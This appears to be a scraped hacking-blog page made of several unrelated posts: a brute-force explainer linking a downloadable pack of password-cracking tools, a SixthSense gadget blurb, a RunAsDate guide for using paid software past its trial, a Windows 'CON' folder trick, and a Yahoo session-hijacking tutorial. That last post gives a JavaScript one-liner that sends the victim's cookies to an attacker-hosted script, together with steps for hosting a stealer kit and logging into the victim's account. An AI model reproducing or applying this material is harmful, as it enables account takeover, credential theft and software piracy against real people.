What is Brute Force - Password cracking ?

 
Hello , The topic of this article is "Brute Force".In this article i will explain the meaning of bruteforce and will provide some top Brute force softwares to download.Lets Strat....

 Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies. Just as a criminal might break into, or "crack" a safe by trying many possible combinations, a brute force cracking application proceeds through all possible combinations of legal characters in sequence. Brute force is considered to be an infallible, although time-consuming, approach.

Crackers are sometimes used in an organization to test network security, although their more common use is for malicious attacks. Some variations, such as L0phtcrack from L0pht Heavy Industries, start by making assumptions, based on knowledge of common or organization-centered practices and then apply brute force to crack the rest of the data. L0phtcrack uses brute force to crack Windows NT passwords from a workstation. PC Magazine reported that a system administrator who used the program from a Windows 95 terminal with no administrative privileges, was able to uncover 85 percent of office passwords within twenty minutes.

You must have seen in movies how a hacker cracks a password. He take out a small device from his pocket. Connect it to the locker or whatever he wants to crack and then lots of digits and alphabets are shuffled on the device’s screen and in a matter of minutes (and sometimes in seconds), the thing is unlocked. Pretty Impressive but it doesn’t happen that way. Basically a online system (by online system i means a system which requires you to log in to get access) can’t be hacked like that. Even a password stored in a offline file can’t be hacked so easily.

Lets take it as easy as it can get. You want to access a file which is password protected. You create a program that tries every possible combination of alphabets and numbers and then feed it to the file if its the right one. This procedure is repeated till the right combination is accepted by the file. This is what we call as a attack. And this very procedure of trying possible combinations is called Brute Force Attack.

Now executing such a program which is required to provide every possible combination requires a very good computing power. The time that it consumes in breaking a password depends on the length of password and the processor speed. Faster the processor, shorter the time it takes to crack the password. Think it would be easy if you have a dual core or quad core, Think again. On Desktop PCs it can take days to crack a password.

Memory Space Trade Off – It is a situation in which time taken for processing can be reduced at the cost of space and vice versa. To make it very clear, lets see this again with the help of an example. In the previous example, we can process the different combination before hand and then store them in a file. And when you need to break a password, combinations are retrieved from that file and this lessens the load on the processor. The only time consumption in this case is the retrieval of data from that file. This file is what is known as a Rainbow Table. It can break passwords in a few minutes and in even a few seconds depending how strong is the password. It can be obtained from the World Wide Web but beware of its size. Its size is in GBs.

Now even if a hacker has the best of hardware, he can’t hack that easily. Why? Ever entered a password wrong multiple times? It requires you to enter the image to confirm that you are a human and it is not a account and even if that fails (yes there are algorithms that can read the text behind the image), the user is forbidden to enter the password for a fixed amount of time. So, there is no way in hell that a hacker can hack by Brute force or even with the help of rainbow tables. But it surely gets the job done for offline files.

If I write more here in a single post, it would be difficult for many of us to analyze the information. So, more in coming lets-hack articles.But i am providing some most top used Brute force softwares,you can download them and use for testing purpose...

This pack includes the following fully workable softwares:

1.Attack tool kit
2.CrackWhore 2.0
3.Apache scanner
4.Brutus
5.Brutus 2006
6.CGI scan
7.crackftp
8.E-mail cracker
9.hackers utillity
10.php brutforcer
11.php BB pass extracter
12.php cracker
13.shadow scan
14.web crack 4.0
and a few more

download links:

 http://www.megaupload.com/?d=6GHU7XVB

Hope all of you will like this brief info,and download,Comment pleasee...

Pranav Mistry: The thrilling potential of SixthSense technology

ABOUT

'SixthSense' is a wearable gestural interface that augments the physical world around us with digital information and lets us use natural hand gestures to interact with that information.

We've evolved over millions of years to sense the world around us. When we encounter something, someone or some place, we use our five natural senses to perceive information about it; that information helps us make decisions and chose the right actions to take. But arguably the most useful information that can help us make the right decision is not naturally perceivable with our five senses, namely the data, information and knowledge that mankind has accumulated about everything and which is increasingly all available online. Although the miniaturization of computing devices allows us to carry computers in our pockets, keeping us continually connected to the digital world, there is no link between our digital devices and our interactions with the physical world. Information is confined traditionally on paper or digitally on a screen. SixthSense bridges this gap, bringing intangible, digital information out into the tangible world, and allowing us to interact with this information via natural hand gestures. ‘SixthSense’ frees information from its confines by seamlessly integrating it with reality, and thus making the entire world your computer.

The SixthSense prototype is comprised of a pocket projector, a mirror and a camera. The hardware components are coupled in a pendant like mobile wearable device. Both the projector and the camera are connected to the mobile computing device in the user’s pocket. The projector projects visual information enabling surfaces, walls and physical objects around us to be used as interfaces; while the camera recognizes and tracks user's hand gestures and physical objects using computer-vision based techniques. The software program processes the video stream data captured by the camera and tracks the locations of the colored markers (visual tracking fiducials) at the tip of the user’s fingers using simple computer-vision techniques. The movements and arrangements of these fiducials are interpreted into gestures that act as interaction instructions for the projected application interfaces. The maximum number of tracked fingers is only constrained by the number of unique fiducials, thus SixthSense also supports multi-touch and multi-user interaction.

The SixthSense prototype implements several applications that demonstrate the usefulness, viability and flexibility of the system. The map application lets the user navigate a map displayed on a nearby surface using hand gestures, similar to gestures supported by Multi-Touch based systems, letting the user zoom in, zoom out or pan using intuitive hand movements. The drawing application lets the user draw on any surface by tracking the fingertip movements of the user’s index finger. SixthSense also recognizes user’s freehand gestures (postures). For example, the SixthSense system implements a gestural camera that takes photos of the scene the user is looking at by detecting the ‘framing’ gesture. The user can stop by any surface or wall and flick through the photos he/she has taken. SixthSense also lets the user draw icons or symbols in the air using the movement of the index finger and recognizes those symbols as interaction instructions. For example, drawing a magnifying glass symbol takes the user to the map application or drawing an ‘@’ symbol lets the user check his mail. The SixthSense system also augments physical objects the user is interacting with by projecting more information about these objects projected on them. For example, a newspaper can show live video news or dynamic information can be provided on a regular piece of paper. The gesture of drawing a circle on the user’s wrist projects an analog watch.

The current prototype system costs approximate $350 to build. Instructions on how to make your own prototype device can be found here (coming soon).

     


         

     

How to Hack Softwares to use them Forever ?

Hi, I am back today with a most usefull article..Hope all of you will Like It ! Here i will show you that "How to Hack Softwares to use them Forever ?" . That really a useful article,because in our daily life we need thousand of softwares today,which of most are highly paid..So how to use them Freely for whole Like ??

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.Because Purpose if ICA is 1st to clear your basics.So,When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

Download RunAsDate v1.10

Intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate .
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on oct 1 2009, always inject the date as sep 30 2009 in the RunAsDate.

Warning : AVG Antivirus reports that RunAsDate is infected with "Trojan horse Generic 10.Thk". This will not harm ur pc,warning is just bcoz this is a wondow registry hack tool !

Windows Mystery Exposed : Can you make a folder named ‘CON’ ?

Hello, I am back with a most funny and mysterious artice.. Hope all of you will enjoy to know all this... One day my Sir told me that he got a mail the message written on that is almost as below...

Nobody can create a FOLDER anywhere on the computer which can be named as “CON”.
This is something pretty cool…and unbelievable… At Microsoft the whole Team, including Bill Gates, couldn’t answer why this happened!
TRY IT NOW !!

This is not the first time I listen about this funny question that "why we can't create a folder with name 'CON' " ?, and I’m sure most of ICA member also try to make folder "CON" just now after reading the title of article  ! if no,then go and 1st try it .... If you try creating a folder named CON, as the mail claims, it’ll get renamed automatically to New Folder. But there is no mystery behind this, and the team at Microsoft very well knows the reason for this. :-)

Why is it not possible to create a folder named CON ?
Before we proceed further, let me tell you a small secret you can’t even create a folder named PRN, AUX, NUL and many others.

The reason you can’t create a folder with these names is because these are reserved keywords used by DOS. The below screen-shot taken from Microsoft’s website shows a list of reserved keywords in DOS.

If you try creating a folder with any of these names, the name automatically changes back to the default “New Folder”. And this is what has caused the confusion. Instead of automatically renaming the folder, had an explanatory warning message popped up.

You can actually create a folder named CON !!
There is actually a way to create a folder named CON, or any other name from the above list of reserved keywords. This can be done through command prompt. But it is advisable not to do so, as it might result in your system becoming unstable.

Step 1: To create a folder named CON, go to command prompt and type “MD \\.\D:\CON” (without quotes). This will create a folder named CON in D:. See the screenshot.

Step 2: You cannot delete this folder by normal delete. To delete the folder, again go to command prompt and type “RD \\.\D:\CON” without quotes.

Step 3: I’ll again recommend you not to try this on your system, as it might become unstable. In case you can’t stop yourself, don’t do it on a drive on which Windows is installed (generally C:).

So people ,On a machine everything is possible...

Hack Yahoo accounts with Session IDs or session cookies !

What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.





Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thank you for reading this Article.
Admin.

Lets HACK...!!